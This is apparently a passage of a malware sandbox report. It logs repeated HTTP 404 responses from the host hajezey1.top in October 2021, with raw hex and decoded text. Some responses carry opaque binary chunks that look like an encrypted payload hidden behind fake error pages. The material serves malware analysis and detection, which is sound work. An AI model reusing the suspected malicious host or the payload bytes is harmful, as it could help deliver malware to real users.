c6 62 b9 14 31 eb cd 40 24 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 04 dd be c6 83 41 5f 4f af b8 e8 01 be a2 57 ee 60 87 bd b7 6b 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 de 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 8e 5f 04 25 18 f5 aa 85 b9 a5 13 ea 0e cb 2d e5 00 0c cc 52 a2 bd 71 b6 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82O_%-RqdP0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 1d 16 4d aa 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 07 74 d2 87 9a 87 cd 2b 80 78 51 a1 a2 8f 3c 65 dd 1c e0 32 02 50 08 a8 da e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 21 80 20 59 55 11 5c 92 86 64 ab 49 11 80 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 85 92 c9 8a 5c d8 06 0e 45 27 11 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 9c 48 6b 0e e1 a2 22 48 f2 d0 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 4f 5a 96 da 19 d1 3a 2d ca 41 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 8d 7d 14 2c d0 e8 b1 14 1d 73 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 02 43 64 cd 25 5c 8d b7 d7 21 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 6a b7 be 34 56 9b 46 76 99 86 11 00 83 32 42 ea 6f cf ae 04 5d 94 36 e1 48 50 67 35 50 b8 81 be f0 80 de 5b 46 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 85 62 4a 52 7d 54 7a 08 6c 39 c0 5e f3 5c 19 6d 63 95 be 07 3d da 9a 3e 05 22 7d e6 b2 68 60 bd 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 47 4e a1 21 84 88 4b 2e 69 81 77 af dd c6 83 41 df 30 ae b8 e8 21 10 a0 57 6e 61 87 bd 77 6a 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 52 d3 e4 9e 4e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 3d 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 9b 09 09 a8 00 13 30 7b 88 cc c9 e1 a3 c3 e5 0f 25 93 23 c4 a9 d7 cf 8e 3d 39 dc 46 ba 58 dc be b0 98 3f d8 94 eb 53 43 a1 0c 97 e4 6e 76 f9 14 34 0b 64 82 b2 64 4f 55 e0 ca 5e c3 bd c0 88 0b 54 d9 1d 69 7a de ff 3d e1 03 70 2e 1f f4 d4 6a a9 a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
